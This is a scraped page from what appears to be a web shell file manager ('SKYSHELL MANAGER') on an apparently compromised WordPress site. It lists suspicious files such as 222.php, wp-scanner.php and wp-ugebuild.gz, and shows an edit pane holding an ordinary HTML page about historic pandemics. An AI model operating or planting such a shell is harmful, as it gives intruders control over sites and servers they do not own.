📁
SKYSHELL MANAGER
PHP v8.1.29
Create
Create
Path:
root
/
var
/
www
/
html
/
wxwpsite
/
surefundeals
/
Name
Size
Perm
Actions
📁
wp-admin
-
0755
🗑️
🏷️
🔒
📁
wp-content
-
0755
🗑️
🏷️
🔒
📁
wp-includes
-
0755
🗑️
🏷️
🔒
📄
.htaccess
0.51 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
222.php
15.76 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
admin.php
15.76 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
index.php
0.4 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
license.txt
19.44 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
readme.html
7.23 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
robots.txt
0.07 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-activate.php
7.2 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-blog-header.php
0.34 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-comments-post.php
2.27 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-config-sample.php
3.26 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-config.php
3.54 KB
0666
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-cron.php
5.49 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-links-opml.php
2.43 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-load.php
3.84 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-login.php
50.66 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-mail.php
8.52 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-scanner.gz
21.5 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-scanner.php
0.15 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-settings.php
31.88 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-signup.php
33.94 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-trackback.php
5.09 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-ugebuild.gz
47.66 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-ugebuild.php
0.16 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
xmlrpc.php
3.13 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
yyj.txt
0 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
Edit: worst-pandemics.php
<!DOCTYPE html> <html lang="en"> <head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <meta http-equiv="X-UA-Compatible" content="ie=edge"> <link rel="shortcut icon" href="assets/images/favicon.ico" type="image/x-icon"> <link rel="icon" href="assets/images/favicon.ico" type="image/x-icon"> <title>Worst Pandemics In History - Flu Attack Defender</title> <!-- Bootstrap --> <link href="assets/css/bootstrap.min.css" rel="stylesheet"> <link href="assets/css/font-awesome.min.css" rel="stylesheet"> <link href="assets/css/magnific-popup.css" rel="stylesheet"> <link href="assets/css/jquery-ui.css" rel="stylesheet"> <link href="assets/css/animate.css" rel="stylesheet"> <link href="assets/css/owl.carousel.min.css" rel="stylesheet"> <!-- Main css --> <link href="assets/css/main.css" rel="stylesheet"> <!-- HTML5 shim and Respond.js for IE8 support of HTML5 elements and media queries --> <!-- WARNING: Respond.js doesn't work if you view the page via file:// --> <!--[if lt IE 9]> <script src="https://oss.maxcdn.com/html5shiv/3.7.3/html5shiv.min.js"></script> <script src="https://oss.maxcdn.com/respond/1.4.2/respond.min.js"></script> <![endif]--> </head> <body> <!-- Preloader --> <div class="preloader"> <div class="lds-default"><div></div><div></div><div></div><div></div><div></div><div></div><div></div><div></div><div></div><div></div><div></div><div></div></div> </div><!-- /Preloader --> <!--Header Area--> <!--Header Area--> <header class="header-area fixed-header"> <nav class="navbar navbar-expand-lg main-menu"> <div class="container"> <a class="navbar-brand" href="index.php"><img src="assets/images/logo3.png" class="d-inline-block align-top" alt=""></a> <button class="navbar-toggler" type="button" data-toggle="collapse" data-target="#navbarSupportedContent" aria-controls="navbarSupportedContent" aria-expanded="false" aria-label="Toggle navigation"> <span class="menu-toggle"></span> </button> <div class="collapse navbar-collapse" id="navbarSupportedContent"> <ul class="navbar-nav m-auto"> <li class="nav-item"> <a class="nav-link" href="index.php">Home</a> </li> <li class="nav-item"><a class="nav-link" href="about.php">About us</a></li> <li class="nav-item active"><a class="nav-link" href="worst-pandemics.php">Worst Pandemics</a></li> <li class="nav-item"><a class="nav-link" href="testing.php">Testing Centers</a></li> <li class="nav-item"><a class="nav-link" href="contact.php">Contact</a></li> </ul> <div class="header-btn justify-content-end"> <a href="contact.php" class="bttn-small btn-fill">+800 564 8367</a> </div> </div> </div> </nav> </header><!--/Header Area--> <!--breadcrumb area--> <section class="breadcrumb-area dark-overlay" style="background: url('assets/images/banners/1.jpg') no-repeat fixed;"> <div class="container"> <div class="row"> <div class="col-xl-8 col-lg-8 col-md-12 col-sm-12"> <div class="banner-title"> <h2>Pandemics In History</h2> </div> <ul> <li><a href="index.php">Home</a></li> <li>Pandemics In History</li> </ul> </div> </div> </div> </section><!--/breadcrumb area--> <!--About Section--> <section class="about-area gray-bg" style="padding-top:6%"> <div class="about-content-inner-2" style="width:85%;margin:0% 0% 0% 8%;text-align:justify"> <div class="section-title mb-10"> <div class="full" style="width:100%;height:430px;"> <div class="left" style="width:60%;float:left;"> <h2>6 of the Worst Pandemics in History</h2> <p>In late December 2019, the world was introduced to a novel coronavirus—SARS-CoV-2—a pathogen that causes COVID-19. Just over two months later, the World Health Organization (WHO) declared the coronavirus outbreak a pandemic, meaning the virus had spread across several countries and sickened a large number of people.</p> <p>Realistically speaking, the next pandemic wasn't a far-fetched idea—in part, because it's already happened multiple times before: "When we talk about another flu pandemic happening, it's not a matter of if, but when," said Dennis Carroll, PhD, director of USAID's Emerging Threats Unit, in the trailer for the Netflix docuseries, Pandemic: How to Prevent an Outbreak. (FYI: Coronavirus is not influenza, though the symptoms may sometimes look similar.)</p> </div> <div class="col-xl-6 col-lg-6 col-md-6 col-sm-12 wow fadeInUp" data-wow-delay="0.4s" style="width:38%;float:right;margin-top:5%"> <img src="assets/images/products/feature-1.jpg" alt=""> </div> </div> <p>Our extremely interconnected world is largely to blame. “Viruses used to spread at the speed of a steamboat; now they can spread at the speed of a jet. In that sense, we’re more at risk,” infectious disease expert Amesh A. Adalja, MD, senior scholar at the Johns Hopkins Center for Health Security, tells Health. There are also more densely populated cities now than ever before, Dr. Adalja points out, and that can create an environment that’s ripe for the rapid spread of pandemic diseases. On the flip side, there's a "very sophisticated" healthcare system in place, both in the U.S. and globally, Dr. Adalja says. “We have antivirals, vaccines, and pharmaceutical companies that can develop countermeasures for new emerging diseases,” he says.</p> <p>In talking about future pandemics, the Netflix series also dives briefly into a few of the worst flu pandemics of the past, particularly the Spanish flu pandemic of 1918. Here's a look at some of the worst pandemics—both flu-related and not, though excluding the current coronavirus pandemic—in modern history.</p> <section class="growth-stat section-padding" style="padding:0% !important"> <div class="container"> <!-- <div class="row mb-30"> <div class="col-xl-6 col-lg-6 col-md-6 col-sm-12 wow fadeInUp" data-wow-delay="0.4s"> <div class="growth-content"> <div class="content-grow" style="margin-top:5%"> <p>As per UNDP's 2010 report, India had 2.395 million people living with HIV at the end of 2009, up from 2.27 million in 2008. Adult prevalence also rose from 0.29% in 2008 to 0.31% in 2009.[30] Setting up HIV screening centres was the first step taken by the government to screen its citizens and the blood bank.</p> <p>The adult HIV prevalence in India is declining from estimated level of 0.41% in 2000 through 0.36% in 2006 to 0.31% in 2009. Adult HIV prevalence at a national level has declined notably in many states, but variations still exist across the states. A decreasing trend is also evident in HIV prevalence among the young population of 15–24 years.</p> <p>A 2012 report described a need for youth HIV counseling.[31]</p> </div><br> <p>According to NACO data, India has demonstrated an overall reduction of 57 percent in estimated annual new HIV infections (among adult population) from 0.274 million in 2000 to 0.116 million in 2011, and the estimated number of people living with HIV was 2.08 million in 2011.[32][33]</p> <p>According to NACO, the prevalence of AIDS in India in 2015 was 0.26%, down from 0.41% in 2002;[34] in 2016, it had risen to 0.30%.[3] </p> </div> </div> </div> </div>--> <h2>Asian Flu (1956-1958)</h2> <p>Death Toll: 2 million<br> Cause: Influenza<br> Asian Flu was a pandemic outbreak of Influenza A of the H2N2 subtype, that originated in China in 1956 and lasted until 1958. In its two-year spree, Asian Flu traveled from the Chinese province of Guizhou to Singapore, Hong Kong, and the United States. Estimates for the death toll of the Asian Flu vary depending on the source, but the World Health Organization places the final tally at approximately 2 million deaths, 69,800 of those in the US alone.</p> <h2>Flu Pandemic (1918)</h2> <p>Death Toll: 20 -50 million<br> Cause: Influenza<br> Between 1918 and 1920 a disturbingly deadly outbreak of influenza tore across the globe, infecting over a third of the world’s population and ending the lives of 20 – 50 million people. Of the 500 million people infected in the 1918 pandemic, the mortality rate was estimated at 10% to 20%, with up to 25 million deaths in the first 25 weeks alone. What separated the 1918 flu pandemic from other influenza outbreaks was the victims; where influenza had always previously only killed juveniles and the elderly or already weakened patients, it had begun striking down hardy and completely healthy young adults, while leaving children and those with weaker immune systems still alive.</p> <h2>Sixth Cholera Pandemic (1910-1911)</h2> <p>Death Toll: 800,000+<br> Cause: Cholera<br> Like its five previous incarnations, the Sixth Cholera Pandemic originated in India where it killed over 800,000, before spreading to the Middle East, North Africa, Eastern Europe and Russia. The Sixth Cholera Pandemic was also the source of the last American outbreak of Cholera (1910–1911). American health authorities, having learned from the past, quickly sought to isolate the infected, and in the end only 11 deaths occurred in the U.S. By 1923 Cholera cases had been cut down dramatically, although it was still a constant in India.</p> <h2>Flu Pandemic (1889-1890)</h2> <p>Death Toll: 1 million<br> Cause: Influenza<br> Originally the “Asiatic Flu” or “Russian Flu” as it was called, this strain was thought to be an outbreak of the Influenza A virus subtype H2N2, though recent discoveries have instead found the cause to be the Influenza A virus subtype H3N8. The first cases were observed in May 1889 in three separate and distant locations, Bukhara in Central Asia (Turkestan), Athabasca in northwestern Canada, and Greenland. Rapid population growth of the 19th century, specifically in urban areas, only helped the flu spread, and before long the outbreak had spread across the globe. Though it was the first true epidemic in the era of bacteriology and much was learned from it. In the end, the 1889-1890 Flu Pandemic claimed the lives of over a million individuals.</p> <h2>Third Cholera Pandemic (1852–1860)</h2> <p>Death Toll: 1 million<br> Cause: Cholera<br> Generally considered the most deadly of the seven cholera pandemics, the third major outbreak of Cholera in the 19th century lasted from 1852 to 1860. Like the first and second pandemics, the Third Cholera Pandemic originated in India, spreading from the Ganges River Delta before tearing through Asia, Europe, North America and Africa and ending the lives of over a million people. British physician John Snow, while working in a poor area of London, tracked cases of cholera and eventually succeeded in identifying contaminated water as the means of transmission for the disease. Unfortunately the same year as his discovery (1854) went down as the worst year of the pandemic, in which 23,000 people died in Great Britain.</p> <h2>The Black Death (1346-1353)</h2> <p>Death Toll: 75 – 200 million<br> Cause: Bubonic Plague<br> From 1346 to 1353 an outbreak of the Plague ravaged Europe, Africa, and Asia, with an estimated death toll between 75 and 200 million people. Thought to have originated in Asia, the Plague most likely jumped continents via the fleas living on the rats that so frequently lived aboard merchant ships. Ports being major urban centers at the time, were the perfect breeding ground for the rats and fleas, and thus the insidious bacterium flourished, devastating three continents in its wake.</p> </div> </section><!-- /How it works Area --> </div> </div> </section><!--/About Section--> <!--Footer Area--> <footer class="footer-area section-padding black-bg-2"> <div class="container"> <div class="row justify-content-center"> <div class="col-xl-10 col-lg-10 col-md-12 col-sm-12"> <div class="footer-logo centered mb-4"> <img src="assets/images/logo3.png" alt=""> </div> <div class="footer-nav"> <ul> <li><a href="privacy.php">Privacy Policy</a></li> <li><a href="terms.php">Terms and Conditions</a></li> <li><a href="subcribe.php">Subscribe</a></li> <li><a href="un-subscribe.php">Un-Subscribe</a></li> </ul> </div> <div class="copyright"> <p>Copyright © 2020 All Rights Reserved</p> </div> </div> </div> </div> </footer><!--/Footer Area--> <!-- jQuery (necessary for Bootstrap's JavaScript plugins) --> <script src="assets/js/jquery-3.2.1.min.js"></script> <script src="assets/js/jquery-migrate.js"></script> <script src="assets/js/jquery-ui.js"></script> <script src="assets/js/popper.js"></script> <script src="assets/js/bootstrap.min.js"></script> <script src="assets/js/owl.carousel.min.js"></script> <script src="assets/js/magnific-popup.min.js"></script> <script src="assets/js/imagesloaded.pkgd.min.js"></script> <script src="assets/js/isotope.pkgd.min.js"></script> <script src="assets/js/waypoints.min.js"></script> <script src="assets/js/jquery.counterup.min.js"></script> <script src="assets/js/wow.min.js"></script> <script src="assets/js/scrollUp.min.js"></script> <script src="assets/js/script.js"></script> </body> </html>
Save